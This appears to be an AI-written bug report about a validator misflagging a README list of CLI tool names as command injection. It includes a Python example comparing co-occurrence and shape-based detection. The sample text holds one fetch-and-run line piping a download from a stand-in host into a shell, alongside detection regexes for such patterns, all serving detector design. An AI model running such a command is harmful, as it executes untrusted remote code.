This is the Claude responsible for the ai-maestro-plugin project.
False positive: code_execution CMD_INJECTION on a prose list of backticked CLI tool names in README
cpv-remote-validate plugin . --strict flagged this README prose at README.md:29 as command injection:
The AMP/AID shell scripts need `curl`, `jq`, `openssl`, and `base64`.
A comma-separated list of individually-backticked command names (a Requirements section) is not command injection. The detector appears to treat the co-occurrence of openssl/base64/curl tokens as an exec pattern.
Repro
A "Requirements"/"Dependencies" README line listing backticked tool names.
Impact
Blocks publish under --strict; I had to reword to "the `curl, jq, openssl, base64` CLI tools" to pass.
Remedy — detector precision, NOT an exempt-list. Please fix the matcher so it does not fire on this benign shape. Do not address it by adding an exempt/allow-list entry: an exempt mechanism is exploitable by a malicious actor (a real payload can be shaped to match an allow-list entry), so genuinely-malicious matches must be devitalized or removed, never suppressed. This mirrors the framing of #76 ("demotes, does not suppress").
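The difference between matching on token co-occurrence and matching on the shape of a code span, as an added example that is not part of the report and not cpv's code: `naive_hits` models the behaviour the report suspects, and `shaped_hits` is a hypothetical matcher that decides per inline code span, with no exempt list. All function names and sample line 4 are constructed, and only inline backtick spans are inspected.

```python
import re

# Constructed sample: line 2 is the README sentence from the report, line 3 the
# reworded form, line 4 a constructed span that does have execution structure.
SAMPLE = """\
## Requirements
The AMP/AID shell scripts need `curl`, `jq`, `openssl`, and `base64`.
Needs the `curl, jq, openssl, base64` CLI tools.
Install with `curl -s https://example.invalid/i.sh | base64 -d | sh`.
"""

CODE_SPAN = re.compile(r"`([^`\n]+)`")
TOOL_TOKENS = re.compile(r"\b(curl|openssl|base64)\b")
# Shell structure that makes a span executable rather than a name:
# command substitution, pipes, chaining, redirection.
EXEC_STRUCTURE = re.compile(r"\$\(|[|;&<>]")


def naive_hits(text):
    """Model of the suspected behaviour: fire on token co-occurrence in a line."""
    return [n for n, line in enumerate(text.splitlines(), 1)
            if len(set(TOOL_TOKENS.findall(line))) >= 2]


def shaped_hits(text):
    """Fire only when a single code span contains shell execution structure."""
    hits = []
    for n, line in enumerate(text.splitlines(), 1):
        for span in CODE_SPAN.findall(line):
            if EXEC_STRUCTURE.search(span):
                hits.append((n, span))
    return hits


if __name__ == "__main__":
    print("co-occurrence:", naive_hits(SAMPLE))
    print("shape-based:  ", shaped_hits(SAMPLE))
```
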